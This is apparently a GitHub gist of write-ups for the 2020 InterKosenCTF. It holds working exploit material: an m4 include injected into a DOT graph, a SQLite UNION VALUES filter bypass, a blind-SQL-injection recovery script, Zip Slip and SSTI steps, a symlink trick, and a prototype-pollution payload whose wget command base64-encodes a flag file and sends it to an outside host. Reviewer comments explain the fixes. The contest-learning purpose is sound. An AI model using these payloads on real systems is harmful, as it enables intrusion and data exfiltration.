
@po6ix
Last active September 6, 2020 13:23
2020 InterKosenCTF Writeups
// Graph submitted to a graph-rendering challenge. Apart from the small demo graph,
// the part that matters is the multi-line quoted string below: it is a node name
// whose text is a macro-preprocessor file-inclusion directive.
// NOTE(review): this only has an effect if the service passes submitted graph text
// through a macro preprocessor before rendering it - the server side is not shown
// here. The fix on that side is to render untrusted DOT with no preprocessing step
// and to keep secrets out of the filesystem view of the rendering process.
digraph g1 {
subgraph cluster_0 {
style=filled;
color=lightgrey;
node [style=filled, color=white];
a0 -> a1 -> a2 -> a3;
}
start -> a0;
a3 -> end;
a1 -> b3;
a3 -> a0;
"
include(`flag_foxtrot.txt')
";
start [shape=doublecircle];
end [shape=doublecircle];
}
sqlite> select 1 union values (4);
1
4

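In SQLite, `VALUES (...)` can be used in place of a second `SELECT` after `UNION`, so an input filter keyed on `UNION SELECT` does not match this form.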

import glob, re
import urllib.parse
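# Rebuild a secret from captured HTTP traffic stored under http/.
#
# Every capture's file name is the URL-encoded request and its content is the
# HTML response. From the request we parse a position in the secret and a
# modulus; from the response we take the largest number found in a
# <th scope="row"> cell as the residue for that modulus.
# NOTE(review): presumably the request selects one character of the secret and
# the row count leaks `char % mod` - confirm against the captured queries.
# For detection, the pattern is many requests that differ only in position
# and modulus.
stack = [[] for _ in range(51)]  # stack[position] -> list of (mod, residue)
files = glob.glob('http/*')
for name in files:
    query = urllib.parse.unquote(name).replace('+', ' ')
    # Position is the text between "(secret, " and 6 characters before "FROM".
    index = int(query[query.index('(secret, ') + 9:query.index('FROM') - 6])
    # Modulus is whatever follows the first '%' in the decoded query.
    mod = int(query.split('%')[1])
    # Context manager so the handle is closed even if read() fails.
    with open(name) as capture:
        content = capture.read()
    rows = [int(c) for c in re.findall(r'<th scope="row">([\d]+)</th>', content)]
    # A response without numbered rows counts as residue 0 (this replaces the
    # former blanket `except Exception`, whose only reachable case was max([])).
    stack[index].append((mod, max(rows, default=0)))

recovered = ''
for i in range(1, len(stack)):
    # Keep the byte values 0..127 that satisfy every (mod, residue) observation
    # for this position; the list is ascending, so [0] is the smallest match.
    candidates = [
        j for j in range(128)
        if all(j % mod == residue for mod, residue in stack[i])
    ]
    # Contradictory observations leave no candidate: mark the position with '?'
    # instead of aborting the whole recovery with an IndexError.
    recovered += chr(candidates[0]) if candidates else '?'
print(recovered)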
import requests
import json
# Challenge instance this request is sent to; use 'localhost' instead when
# running a local copy of the service.
HOST = 'web.kosenctf.com'
PORT = 14002

# Request body, sent verbatim as JSON text. The nested "__proto__" keys under
# "start" are the point of it: a server that recursively copies or merges this
# object into plain JavaScript objects can end up writing "heap" onto
# Object.prototype (prototype pollution).
# NOTE(review): the server code is not shown here. The string after
# "BinaryHeap|" only matters if the service later turns that property into
# code, so the server-side fixes are to reject "__proto__" / "constructor" /
# "prototype" keys when merging input and to pick the heap implementation from
# a fixed allow-list instead of evaluating a string.
data = '''{"map":[[0,0,0]],"start":{"0":2,"1":0,"__proto__":{"__proto__":{"heap":"BinaryHeap|console.log(process.mainModule.require('child_process').execSync(`wget \\"http://p6.is?$(cat /flag-b1987621d8c3e66b3003f272e43252c6.txt|base64 | tr '\\\\n' :)\\"`).toString())//"}}},"goal":{"0":0,"1":0},"heap":null}'''

endpoint = f"http://{HOST}:{PORT}/solve"
json_headers = {"Content-Type": "application/json"}
response = requests.post(endpoint, headers=json_headers, data=data)
print(response.text)
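  1. The tar.gz extraction is vulnerable to Zip Slip (entry names containing `../` are not rejected)
  2. Use it to overwrite `../template`
  3. SSTI in the overwritten template -> RCE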

# Work from a scratch directory under /tmp.
mkdir /tmp/posix
cd /tmp/posix
# NOTE(review): ln -s takes TARGET first and LINK_NAME second, so as written
# this asks for a link at /home/pwn/flag.txt pointing to xxxx.txt; confirm the
# intended argument order against the author's notes.
ln -s xxxx.txt /home/pwn/flag.txt
# Presumably the challenge's restricted shell; its checks are not shown here.
# A check on the file name alone does not cover access through a symlink, so
# the fix is to validate the resolved path or refuse to follow links on open.
/home/pwn/pash

-> try to read flag.txt
